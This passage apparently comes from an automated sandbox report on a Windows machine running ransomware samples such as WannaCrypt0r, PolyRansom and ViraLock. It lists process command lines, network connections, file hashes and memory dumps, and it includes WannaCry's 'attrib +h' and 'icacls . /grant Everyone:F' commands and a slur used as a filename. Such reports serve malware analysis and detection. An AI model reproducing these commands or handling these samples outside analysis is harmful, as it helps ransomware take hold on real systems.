/e "918.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ae-fe9c-4363-be05-7a4cbb7cb510}"

C:\Windows\SysWOW64\regedit.exe

/e "919.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ad-fe9c-4363-be05-7a4cbb7cb510}"

C:\Windows\SysWOW64\regedit.exe

/e "920.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{c7b8fb07-bfe1-4c2e-9217-7a69a95bbac4}"

C:\Windows\SysWOW64\regedit.exe

/e "921.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{c7b8fb06-bfe1-4c2e-9217-7a69a95bbac4}"

C:\Windows\SysWOW64\regedit.exe

/e "922.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{7d3830aa-e69e-4e17-8bd1-1b87b97099da}"

C:\Windows\SysWOW64\regedit.exe

/e "923.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be01-7a4cbb6cba12}"

C:\Windows\SysWOW64\regedit.exe

/e "924.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be02-7a4cbb7cbe11}"

C:\Windows\SysWOW64\regedit.exe

/e "925.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be01-7a4cbb6cba13}"

C:\Windows\SysWOW64\regedit.exe

/e "926.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.Protocol\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXw37yn3dbfh0h80cd54t676ex3d8ew3wk.mca"

C:\Windows\SysWOW64\regedit.exe

/e "927.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.Protocol\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXqnst4nt1wwwjx56bzf1wpwyn56fzmp3d.mca"

C:\Windows\SysWOW64\regedit.exe

/e "928.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppX6fe08qd05jq9n5xymcarszkywdk3r16w.mca"

C:\Windows\SysWOW64\regedit.exe

/e "929.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXskcrzs22qh136w607wsfv5z9v35zx4r5.mca"

C:\Windows\SysWOW64\regedit.exe

/e "930.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXv42rtrb1mc702dzsntwk7td5q0r8d235.mca"

C:\Windows\SysWOW64\regedit.exe

/e "931.reg" "HKEY_CURRENT_USER\Software\Microsoft\OneDrive\18.151.0729.0013"

C:\Windows\SysWOW64\regedit.exe

/e "932.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}"

C:\Windows\SysWOW64\regedit.exe

/e "933.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\http"

C:\Windows\SysWOW64\regedit.exe

/e "934.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\https"

C:\Windows\SysWOW64\regedit.exe

/e "935.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe!App\windows.fileTypeAssociation\.fh"

C:\Windows\SysWOW64\regedit.exe

/e "936.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.svg"

C:\Windows\SysWOW64\regedit.exe

/e "937.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\read"

C:\Windows\SysWOW64\regedit.exe

/e "938.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\ms-xbl-3d8b930f"

C:\Windows\SysWOW64\regedit.exe

/e "939.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\microsoft-edge"

C:\Windows\SysWOW64\regedit.exe

/e "940.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\microsoft-edge-holographic"

C:\Windows\SysWOW64\regedit.exe

/e "941.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\Windows.PrintDialog_cw5n1h2txyewy!Microsoft.Windows.PrintDialog\windows.protocol\ms-print-printjobs"

C:\Windows\SysWOW64\regedit.exe

/e "942.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\Windows.PrintDialog_cw5n1h2txyewy!Microsoft.Windows.PrintDialog\windows.protocol\ms-print-addprinter"

C:\Windows\SysWOW64\regedit.exe

/e "943.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.htm"

C:\Windows\SysWOW64\regedit.exe

/e "944.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.pdf"

C:\Windows\SysWOW64\regedit.exe

/e "945.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.html"

C:\Windows\SysWOW64\regedit.exe

/e "946.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.DesktopAppInstaller_1.0.42251.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "947.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-200_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "948.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "949.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.XboxGamingOverlay_2.50.24002.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "950.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "951.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "952.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ZuneVideo_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "953.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "954.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsNotepad_10.2102.13.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "955.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ScreenSketch_11.2104.2.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "956.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Paint_10.2104.17.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "957.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Windows.Photos_21.21030.25003.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "958.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-200_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "959.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.sharewareonline.com/emailentry.aspx?referrer=SOREF_NOTAVAIL&pid=8D-E9-5A-CB-DC-60-C5-00&INSTALLDATE=08092024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff90fa83cb8,0x7ff90fa83cc8,0x7ff90fa83cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\db8ebffdf2d4405d9bfca2398fad1b18 /t 9696 /p 9692

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\WannaCrypt0r.zip"

C:\Program Files (x86)\Registry Cleaner Trial\RegClean.exe

"C:\Program Files (x86)\Registry Cleaner Trial\RegClean.exe"

C:\Users\Admin\Desktop\NIGGARAP.exe

"C:\Users\Admin\Desktop\NIGGARAP.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp

Files


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8d660b6ed8c2b0db09324e321ca8ed5f
SHA1 70866f460dc906ae10c674413d9db438df182284
SHA256 ab8af1fdbfbdb462da66e37d68ff6222df0b22164b2974716f675fc69a9ba233
SHA512 872806a54d50e937159cb162d5bd3cd5201ac82a9fb6b403e7d05f28e931d05d6e6deb93d222d87d0b4c2e17428116100836dc765c8af563154c44167a3b2077

C:\Users\Admin\Downloads\WannaCrypt0r.stNtHzj5.zip.part

MD5 e58fdd8b0ce47bcb8ffd89f4499d186d
SHA1 b7e2334ac6e1ad75e3744661bb590a2d1da98b03
SHA256 283f40e9d550833bec101a24fd6fd6fbd9937ed32a51392e818ffff662a1d30a
SHA512 95b6567b373efa6aec6a9bfd7af70ded86f8c72d3e8ba75f756024817815b830f54d18143b0be6de335dd0ca0afe722f88a4684663be5a84946bd30343d43a8c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9lt6socl.default-release\cache2\doomed\16276

MD5 97ef869fc2de890c9056aef757497d1e
SHA1 1702a3f8c569787f3c26a816afa0f2e65597e446
SHA256 6f88bb3858c6c0d8b58e12268af865ef7acb638cc8b3150d45ff4316e8da79f8
SHA512 1ca1676cf94e1a809c206eb938815c8a1e64bba03f1a802ed387497c0f51f6375138e650a3e4cdb4284ffa993d4c15999632e5bf5a9595fa1617174eb0233c08

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 de4b45f8028114cf9130710a29305037
SHA1 f6f6649e7038797e5bdf95e8fa98edf1dd3ee07c
SHA256 e048a986152d7f5c2390d00253bc3ac2aa3031bab9469489521c4bb6ccdb9192
SHA512 5d615e3d9480fa1384e96266d4da3dc0acdb023de284f4dae8db4ac0e9b1fb7edf1e6264b95347480b2f9ba52f1e5625a88365299b289c2ab9e9d2cae867cc74

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 41b4e662302c0dd6aea2ff8771d3d674
SHA1 5a48ec3876e3d7553aeb8f4a8cf38314d8522446
SHA256 2e5bef7b017ca5c5855740e069ebb678e25a9927863665218abe541617d20434
SHA512 229957ac19ecfd2e0aa70ec08c92e774afe3b62db0897e60e867aec814a8b7c350636680578e13792d864cf5fe3e03c2a7e4f3ac86c21d39d26cff950eb4a069

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9lt6socl.default-release\jumpListCache\cegctLQyW7LZbP5at112o5HQigcvBZ7A4WyaHOJVDn0=.ico

MD5 6b120367fa9e50d6f91f30601ee58bb3
SHA1 9a32726e2496f78ef54f91954836b31b9a0faa50
SHA256 92c62d192e956e966fd01a0c1f721d241b9b6f256b308a2be06187a7b925f9e0
SHA512 c8d55a2c10a2ef484dedded911b8f3c2f5ecb996be6f6f425c5bd4b4f53eb620a2baccd48bac1915a81da9a792971d95ff36c3f216075d93e5fd7a462ecd784f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 43b616766cadb2021ce290732c2cc0ce
SHA1 86e34b8113433a0056e4e778d0bb4d87a23d929d
SHA256 00fa13c96e6cc9fce9b661d8229812cb94c11ed38cc90cadb2243a632006b417
SHA512 9a253e8910e888afca5bb833d1fce70dec927f129b7fa94d1cab83b45c8be02de20b41c43fbc4e5965be75bc4b53a5ecac15237348d3729135ea08556ecdf064

memory/12304-10135-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-10144-0x0000000000400000-0x0000000000989000-memory.dmp

C:\Users\Admin\Desktop\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

C:\Users\Admin\Desktop\@[email protected]

MD5 7a2726bb6e6a79fb1d092b7f2b688af0
SHA1 b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA512 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

C:\@[email protected]

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

MD5 334596c37e1274f300324bf75c0c0f46
SHA1 781599b0082a85bbffc6c51c04ccf38e594d16e3
SHA256 ea54715fc47067d5e85c1157c56b01eebafa2c0ea04705d9c45656b0aaa6c70b
SHA512 0594f7363e75b1d4d924fddf5e86de3da46c770b0b903982bb767bda12a49da1ffc14ff4b80a3e49e1e43b294bf04d50df4324325e42eb7f4e85ce0ef45a912b

C:\Users\Default\Desktop\@[email protected]

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\Desktop\TaskData\Tor\tor.exe

MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

C:\Users\Admin\Downloads\PolyRansom.hekmTEcp.zip.part

MD5 7a5ab2552c085f01a4d3c5f9d7718b99
SHA1 e148ca4cce695c19585b7815936f8e05be22eb77
SHA256 ed8d4bb55444595fabb8172ee24fa2707ab401324f6f4d6b30a3cf04a51212d4
SHA512 33a0fe5830e669d9fafbc6dbe1c8d1bd13730552fba5798530eeb652bb37dcbc614555187e2cfd055f3520e5265fc4b1409de88dccd4ba9fe1e12d3c793ef632

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 cb9a871e042e982d966417447b4c75e7
SHA1 3eaa1b73da3fd648cfe49c159fb57a5b64ec6a5f
SHA256 a38dab98332d159b03120fbc7fe3fa7470bb0c4803bd4025282847b69cad410b
SHA512 371b5931665ef6d8a2610cce88b1908f76a78bddc7fb3152fffcb35d3b8a3fa939b412477963d50ede189e11f70ad3bd2767fd1560906d048a8753ae763c5dab

C:\Users\Admin\Downloads\ViraLock.MPEyn8ML.zip.part

MD5 6a47990541c573d44444f9ad5aa61774
SHA1 f230fff199a57a07a972e2ee7169bc074d9e0cd5
SHA256 b161c762c5894d820cc10d9027f2404a6fec3bc9f8fd84d23ff1daef98493115
SHA512 fe8a4fd268106817efc0222c94cb26ad4ae0a39f99aacaa86880b8a2caa83767ffe8a3dd5b0cdcc38b61f1b4d0196064856bd0191b9c2d7a8d8297c864a7716d

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

MD5 9e8c32680a1d4cbddca43b33a59f8a22
SHA1 c8b20fd3032a4664d2d9a96ed774844926d7cc2f
SHA256 1688a629ac193e7755f30cf981f4f779789cc5d62cae25e76f35fe3539d47212
SHA512 a7569ed92d82af7f5e7e8ed66465f87ccce2d1f2256da4de60cc685b34da4b86a803affc84b8cc9ab29add070222c5ef36f08fa5c7a67bbd28152bd27571f5c4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 4ca12f4d3831470119891f5ffb08f8d2
SHA1 8591a3bbda2a65e5ae9789f96f835359816d1190
SHA256 a799bcd7b4b8d19144a658090a6a35c68db76a32f44a8029f2e38ef71543e67d
SHA512 a7a34f27a3d69686a6646e6c55d5c4b87df3345ac7a529e6311ab626cda9910093d101b3297c25caef65f89d0732e0e27721083de3b4d0af4aa4f3bf04189870

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 2bc7a964bbf30686f146773cf1653588
SHA1 5891a442b427719addd6fca85a06660a29a41960
SHA256 17fe67839ba72d785c704d3addb780f4b33b4b7f8e33b5bad5698873c4641464
SHA512 e35038f31baf4c2817b2fb1c01db7ddb18682772cb1bdb0917fae069e50740b32f5ba38a2aff4ad317dca92f9fda1143bc30192c4ea85912518b3321794537ee

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 e52dae11a42804919626c76e74cd00ee
SHA1 67d2ccf694cd8c768c06961922586c2ad21b9715
SHA256 5de91a254ed06216d3f1972b97e3a7adebc383a47a70cc805912cd0884cb5804
SHA512 c28db4c95b41c1db1ef0b280e7f8b193f79eb8d448a629cd5f831052943779795d6c2ea4e5cd32882ed65cb473b5c7e7a100cd03c26667afa2c8389fd15692fe

memory/5316-11849-0x0000000000400000-0x0000000000432000-memory.dmp

memory/5436-11860-0x0000000000400000-0x0000000000431000-memory.dmp

memory/5952-11859-0x0000000000400000-0x0000000000432000-memory.dmp

memory/13860-11861-0x0000000000400000-0x0000000000432000-memory.dmp

memory/5316-11865-0x0000000000400000-0x0000000000432000-memory.dmp

memory/13932-11872-0x0000000000400000-0x0000000000432000-memory.dmp

memory/13860-11876-0x0000000000400000-0x0000000000432000-memory.dmp

memory/12512-11881-0x0000000000400000-0x0000000000432000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zoQcwIMA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/13932-11885-0x0000000000400000-0x0000000000432000-memory.dmp

memory/1100-11890-0x0000000000400000-0x0000000000432000-memory.dmp

memory/12512-11894-0x0000000000400000-0x0000000000432000-memory.dmp

C:\Users\Admin\Desktop\Endermanch@ViraLock

MD5 76e08b93985d60b82ddb4a313733345c
SHA1 273effbac9e1dc901a3f0ee43122d2bdb383adbf
SHA256 4dc0a8afbf4dbb1a67b9292bb028b7f744f3029b0083c36307b1f84a00692a89
SHA512 4226266b623d502f9b0901355ff388e1fc705e9baff0cbe49a52ef59578e1cc66f5026c030df4c8a8f5000b743523ccf18c533aee269b562d3017d14af014f9d

memory/4592-11899-0x0000000000400000-0x0000000000432000-memory.dmp

memory/1100-11903-0x0000000000400000-0x0000000000432000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/2080-11909-0x0000000000400000-0x0000000000432000-memory.dmp

memory/4592-11913-0x0000000000400000-0x0000000000432000-memory.dmp

memory/5424-11919-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2080-11923-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2096-11928-0x0000000000400000-0x0000000000432000-memory.dmp

memory/5424-11932-0x0000000000400000-0x0000000000432000-memory.dmp

memory/6308-11937-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2096-11941-0x0000000000400000-0x0000000000432000-memory.dmp

memory/6504-11947-0x0000000000400000-0x0000000000432000-memory.dmp

memory/6308-11951-0x0000000000400000-0x0000000000432000-memory.dmp

